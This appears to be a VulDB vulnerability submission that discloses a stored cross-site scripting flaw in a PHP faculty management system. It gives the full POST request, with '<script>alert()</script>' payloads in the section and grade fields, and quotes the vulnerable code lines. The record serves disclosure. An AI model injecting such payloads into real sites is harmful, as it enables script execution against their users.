Submit #255820: code-projects.org Faculty Management System 1 Stored Cross Site-Scriptinginfo

Titlecode-projects.org Faculty Management System 1 Stored Cross Site-Scripting
Description Stored XSS in http://localhost/gan/admin/pages/yearlevel.php. Vulnerable software: https://code-projects.org/faculty-management-system-in-php-with-source-code/ Vulnerable request: POST /gan/admin/php/crud.php HTTP/1.1 Host: localhost Content-Length: 88 sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120" Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/gan/admin/pages/yearlevel.php Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: fusion7k868_session=0qfpifmqa21t89g6fft0a53hs9; fusion7k868_visited=yes; REFERRER=http%3A%2F%2Flocalhost%2Forangescrum-main%2F; user_uniq_agent=81fa84b75a8024ba76b34e57df459f314694749926581a53872d4b; USERSUB_TYPE=0; IS_MODERATOR=0; SES_ROLE=1; FIRST_INVITE_2=1; CPUID=ac57356acee38e7adfdfe2af0a14fe91; CURRENT_FILTER=cases; DEFAULT_PAGE=dashboard; REPLY_SORT_ORDER=ASC; SHOWTIMELOG=Yes; helpdesk_uniq_agent=-1; PHPSESSID=n7ed4n8j05ckj8m7f8npi75pd5 Connection: close action=validate-section&section=<script>alert()</script>&grade=<script>alert(1)</script> Vulnerable file: admin/php/crud.php Lines: 82-84 $year = sanitized($_POST['year']); $section = sanitized($_POST['section']); data = array('year_level'=>$year,'section'=>$section);
Source⚠️ https://drive.google.com/file/d/1s2kLMjnUvlrD_XocoDl3-ABrWYTo5Azd/view?usp=sharing
User
 kerkroups (UID 59969)
Submission12/20/2023 19:31 (2 years ago)
Moderation12/21/2023 17:17 (22 hours later)
StatusAccepted
VulDB entry248744 [code-projects Faculty Management System 1.0 yearlevel.php Year Level/Section cross site scripting]
Points20

PreviousOverviewNext

Interested in the pricing of exploits?

See the underground prices here!